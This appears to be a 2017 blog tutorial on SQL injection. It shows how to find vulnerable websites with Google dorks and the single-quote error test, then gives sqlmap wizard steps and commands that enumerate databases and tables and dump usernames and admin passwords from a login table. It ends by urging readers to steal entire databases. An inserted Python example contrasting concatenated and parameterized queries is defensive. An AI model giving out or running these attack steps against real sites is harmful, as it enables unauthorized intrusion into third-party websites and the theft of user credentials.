Sunday, 29 October 2017

Sql injection

Posted by: covid-19 | Released: October 29, 2017 | Series:

SQL INJECTION TUTORIAL – SQL INJECTION CHEAT SHEET



SQL injection allows us to remotely pull down all the tables, login usernames and admin accounts for a website. The most powerful tool for SQL injection is SQLMAP, which we can use on Windows and Kali Linux.

Step 1 – Download Python for Windows

https://www.python.org/downloads/release/python-2710/

Step 2 – Download SQLMAP for Windows

http://sqlmap.org/

Install to C:/SQLMAP

Step 3 – Find a vulnerable website

Use Google Dorks. Search for dorks like the one in the example below.

php?id=1

Browse to the website and then put a single quote at the end of the URL, so it reads

php?id=1'

Hit Enter. If you get an error, the website is vulnerable.
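Why the single-quote test above produces an error, and what removes it, shown as an added example that is not part of the original post. It uses Python's sqlite3 in place of the site's PHP and database; the pages table, its rows and the function names are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for a site's content table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO pages VALUES (?, ?)",
                   [(1, "Home"), (2, "About")])
    return db

def page_vulnerable(db, raw_id):
    # Before: the request parameter is concatenated into the SQL text, so a
    # stray quote changes the statement itself and the parser rejects it.
    query = "SELECT title FROM pages WHERE id = " + raw_id
    try:
        return ("ok", db.execute(query).fetchall())
    except sqlite3.Error as exc:
        # Returning the raw database error to the client is the signal the
        # quote test relies on.
        return ("db_error", str(exc))

def page_hardened(db, raw_id):
    # After: reject anything that is not a short ASCII integer, then pass
    # the value as a bound parameter so it can never be parsed as SQL.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return ("bad_request", [])
    rows = db.execute("SELECT title FROM pages WHERE id = ?",
                      (int(raw_id),)).fetchall()
    return ("ok", rows)

def lookup_bound_only(db, raw_id):
    # Binding alone is enough for safety: the quote is treated as data,
    # matches no row, and raises no database error.
    return db.execute("SELECT title FROM pages WHERE id = ?",
                      (raw_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1'"):
        print(repr(value), page_vulnerable(db, value), page_hardened(db, value))
```

The hardened handler also never returns the database's error text, so a malformed id looks the same to the client as any other bad request.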


Step 4 – Run SQLMAP Wizard on Windows

Open a command prompt and run this command:

cd c:\SQLMAP

Look for a second sqlmap-project-sqlmap-xxxx directory.

cd sqlmap-project-sqlmap-xxxx

Here you'll see sqlmap.py listed. This is the Python script to be run.

sqlmap.py --wizard

Enter The Dork of the Website – including the id=1

Select Injection Difficulty  (default)

Go for defaults to start off with.

Select Enumeration level

Full enumeration of the database would be level 3, as shown.


Step 5 – ATTACK CODES

SQLMAP will report the OS used in Web Server first – regardless of what attack code is used.

How do we extract all databases?

http://www.website.com/page.php?id=1 --dbs

Look for how many databases there are, and how many tables!!

How do we extract Tables?

http://www.website.com/page.php?id=1 -D www --tables

Did you see all the TABLES on the website list out?

Look for likely targets, e.g. a login, username or password table.

Here we find 11 tables.

Now that we can read the tables, we can start to dump the data out.

How do we get usernames?

http://www.website.com/page.php?id=1 -D www -T uk_cms_gb_login -C username --dump

Look for “admin”

How to get all the Login details?

http://www.website.com/page.php?id=1 -D www -T uk_cms_gb_login --columns

This should display columns with items such as Cookie, ID, IP, Password, Username.

Step 6 – Get Passwords (of Admin)

http://www.website.com/page.php?id=1 -D www -T uk_cms_gb_login -C password --dump

The last thing you can do is steal someone's entire database.
